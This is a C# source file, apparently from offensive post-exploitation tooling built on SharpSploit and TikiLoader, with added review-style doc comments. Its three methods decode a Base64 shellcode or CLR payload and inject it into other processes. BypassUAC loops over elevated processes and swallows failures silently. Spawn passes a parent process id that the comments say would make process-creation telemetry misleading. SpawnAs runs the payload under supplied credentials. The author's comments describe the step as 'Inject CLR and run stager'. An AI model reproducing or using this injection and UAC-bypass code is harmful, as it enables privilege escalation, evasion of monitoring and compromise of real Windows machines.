/// <summary>
/// Walks the processes returned by <c>GetUserProcessTokens(true)</c> and, for each one,
/// hands <paramref name="binary"/>, a decoded payload and that process's id to
/// <c>TikiLoader.Loader.LoadElevated</c>. Stops at the first call that does not throw.
/// </summary>
/// <param name="binary">Passed unchanged to <c>LoadElevated</c> as its first argument.</param>
/// <param name="path">Not read anywhere in this method body.</param>
/// <param name="arguments">Not read anywhere in this method body.</param>
/// <returns>
/// The result of <c>Tokens.RevertToSelf()</c> after the first <c>LoadElevated</c> call that
/// completes without an exception; <c>false</c> when the list is empty or every attempt throws.
/// </returns>
/// <remarks>
/// Review notes:
/// - The payload comes from <c>nutclr</c>, a member declared outside this method; it is
///   Base64-decoded and passed through <c>DecompressDLL</c> once per candidate process.
///   The decode sits outside the try block, so a decode failure propagates to the caller.
/// - Every exception from the loader is swallowed without logging, so a failed attempt
///   leaves no console trace from this method; only the "Elevated processes: N" line is printed.
/// - The candidate list is presumably limited to elevated processes (inferred from the
///   console message and the <c>true</c> argument) - confirm against GetUserProcessTokens.
/// - The author's inline comment describes the loader step as "Inject CLR and run stager".
/// </remarks>
public static bool BypassUAC(string binary, string path, string arguments)
{
    SharpSploit.Credentials.Tokens tokenHelper = new SharpSploit.Credentials.Tokens();

    List<Process> candidates = GetUserProcessTokens(true)
        .Select(entry => entry.Process)
        .ToList();

    Console.WriteLine("Elevated processes: " + candidates.Count);

    for (int index = 0; index < candidates.Count; index++)
    {
        Process candidate = candidates[index];

        // Decoded per iteration and outside the try block, exactly as in the original:
        // an empty candidate list never touches nutclr, and a decode error is not caught here.
        byte[] decoded = DecompressDLL(Convert.FromBase64String(nutclr));

        try
        {
            var loader = new TikiLoader.Loader();
            loader.LoadElevated(binary, decoded, candidate.Id);

            // Kept inside the try: if this revert throws, the catch below reverts again
            // and the loop moves on to the next candidate.
            return tokenHelper.RevertToSelf();
        }
        catch (Exception)
        {
            // Failure is silent by design of the original; only the token state is restored.
            tokenHelper.RevertToSelf();
        }
    }

    return false;
}
/// <summary>
/// Base64-decodes <paramref name="shellcode"/>, passes the bytes through <c>DecompressDLL</c>,
/// and hands the result to <c>TikiLoader.Loader.Load</c> together with
/// <paramref name="binary"/> and <paramref name="ppid"/>.
/// </summary>
/// <param name="binary">Passed unchanged to <c>Load</c> as its first argument.</param>
/// <param name="shellcode">Base64 text; decoded before any error handling is in place.</param>
/// <param name="ppid">
/// Passed unchanged to <c>Load</c>. Presumably a parent process id - confirm in TikiLoader.
/// </param>
/// <returns>
/// <c>true</c> when <c>Load</c> returns without throwing; <c>false</c> when the loader
/// (or its constructor) throws, after the exception message is written to the console.
/// </returns>
/// <remarks>
/// Review notes:
/// - Decoding happens outside the try block, so malformed or null Base64 input raises an
///   exception to the caller instead of producing a <c>false</c> return.
/// - Only <c>Exception.Message</c> is printed; the exception type and stack trace are discarded.
/// - NOTE(review): if <c>ppid</c> does select the parent of a newly created process, the
///   parent/child pair recorded in process-creation telemetry would not match the process that
///   actually made the call - verify against the loader before relying on this.
/// - The author's inline comment describes this as "Inject CLR and run stager".
/// </remarks>
public static bool Spawn(string binary, string shellcode, int ppid)
{
    byte[] rawBytes = Convert.FromBase64String(shellcode);
    byte[] decoded = DecompressDLL(rawBytes);

    try
    {
        var loader = new TikiLoader.Loader();
        loader.Load(binary, decoded, ppid);
        return true;
    }
    catch (Exception ex)
    {
        Console.WriteLine(ex.Message);
        return false;
    }
}
/// <summary>
/// Base64-decodes <paramref name="shellcode"/>, passes the bytes through <c>DecompressDLL</c>,
/// and hands the result to <c>TikiLoader.Loader.LoadAs</c> together with
/// <paramref name="binary"/> and the supplied account details.
/// </summary>
/// <param name="binary">Passed unchanged to <c>LoadAs</c> as its first argument.</param>
/// <param name="shellcode">Base64 text; decoded before any error handling is in place.</param>
/// <param name="domain">Replaced with <c>"."</c> when null or empty, otherwise passed as given.</param>
/// <param name="username">Passed unchanged to <c>LoadAs</c>.</param>
/// <param name="password">Passed unchanged to <c>LoadAs</c> as a plain <c>string</c>.</param>
/// <returns>
/// <c>true</c> when <c>LoadAs</c> returns without throwing; <c>false</c> when the loader
/// (or its constructor) throws, after the exception message is written to the console.
/// </returns>
/// <remarks>
/// Review notes:
/// - Decoding happens outside the try block, so malformed or null Base64 input raises an
///   exception to the caller instead of producing a <c>false</c> return.
/// - The password travels as an ordinary managed string, so it stays in process memory
///   until collected and cannot be zeroed by this code.
/// - Only <c>Exception.Message</c> is printed; the exception type and stack trace are discarded.
/// - NOTE(review): the "." default presumably selects the local machine account database;
///   how the credentials are used is decided inside TikiLoader and is not visible here.
/// - The author's inline comment describes this as "Inject CLR and run stager".
/// </remarks>
public static bool SpawnAs(string binary, string shellcode, string domain, string username, string password)
{
    byte[] rawBytes = Convert.FromBase64String(shellcode);
    byte[] decoded = DecompressDLL(rawBytes);

    try
    {
        var loader = new TikiLoader.Loader();

        // An absent domain falls back to "." before the call.
        string effectiveDomain = string.IsNullOrEmpty(domain) ? "." : domain;

        loader.LoadAs(binary, decoded, effectiveDomain, username, password);
        return true;
    }
    catch (Exception ex)
    {
        Console.WriteLine(ex.Message);
        return false;
    }
}